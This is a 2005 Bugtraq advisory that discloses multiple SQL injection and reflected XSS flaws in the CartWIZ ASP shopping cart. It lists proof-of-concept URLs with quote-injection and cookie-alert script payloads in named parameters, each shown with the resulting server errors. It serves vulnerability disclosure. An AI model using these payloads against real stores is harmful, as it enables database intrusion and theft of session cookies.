Multiple Sql injection and XSS in CartWIZ ASP Cart

From: dcrab (dcrab_at_hackerscenter.com)
Date: 04/24/05

  • Next message: Hyperdose Security: "Local file detection found through Adobe Reader ActiveX control" 
    Date: 24 Apr 2005 01:26:56 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    Dcrab 's Security Advisory
    [Hsc Security Group] http://www.hackerscenter.com/
    [dP Security] http://digitalparadox.org/

    Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

    Severity: High
    Title: Multiple Sql injection and XSS in CartWIZ ASP Cart
    Date: 23/04/2005

    Vendor: CartWIZ
    Vendor Website: http://www.cartwiz.com
    Summary: There are, multiple sql injection and xss in cartwiz asp cart.

    Proof of Concept Exploits:

    http://localhost/cartWiz/store/addToCart.asp?idProduct='SQL_INJECTION&quantity=1
    SQL INJECTION

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL_INJECTION'.

    /cartWiz/store/addToCart.asp, line 86

    http://localhost/cartwiz/store/productDetails.asp?idProduct='SQL%20INJECTION
    SQL INJECTION
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL INJECTION'.

    /cartwiz/store/productDetails.asp, line 34

    http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom=0&priceTo='SQL INJECTION&validate=1
    SQL INJECTION

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.

    /cartwiz/store/searchResults.asp, line 102

    http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku=&priceFrom='SQL INJECTION&priceTo=9999999999&validate=1
    SQL INJECTION

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.

    /cartwiz/store/searchResults.asp, line 102

    http://localhost/cartwiz/store/searchResults.asp?name=&idCategory='SQL INJECTION&sku=&priceFrom=0&priceTo=9999999999&validate=1
    SQL INJECTION

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' or products.briefDescription LIKE '.

    /cartwiz/store/searchResults.asp, line 102

    http://localhost/cartwiz/store/tellAFriend.asp?idProduct='"><script>alert(document.cookie)</script>
    XSS Pops Cookie

    http://localhost/cartwiz/store/addToWishlist.asp?idProduct='"><script>alert(document.cookie)</script>
    XSS Pops Cookie

    http://localhost/cartwiz/store/access.asp?redirect='"><script>alert(document.cookie)</script>
    XSS Pops Cookie

    http://localhost/cartWiz/store/error.asp?message='"><script>alert(document.cookie)</script>
    XSS Pops Cookie

    http://localhost/cartwiz/store/login.asp?message=Please+login+using+the+form+above+to+access+your+account.&redirect='"><script>alert(document.cookie)</script>
    XSS Pops Cookie

    http://localhost/cartwiz/store/login.asp?message='"><script>alert(document.cookie)</script>&redirect=
    XSS Pops Cookie

    http://localhost/cartwiz/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1
    XSS Pops Cookie

    http://localhost/cartwiz/store/searchResults.asp?name='"><script>alert(document.cookie)</script>&idCategory=&sku=&priceFrom=0&priceTo=9999999999&validate=1
    XSS Pops Cookie

    http://localhost/cartwiz/store/productCatalogSubCats.asp?idParentCategory='SQL ERROR
    SQL ERROR

    Microsoft VBScript runtime error '800a000d'

    Type mismatch: '[string: "'SQL ERROR"]'

    /cartwiz/store/productCatalogSubCats.asp, line 87

    Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

    Author:
    These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.

  • Next message: Hyperdose Security: "Local file detection found through Adobe Reader ActiveX control"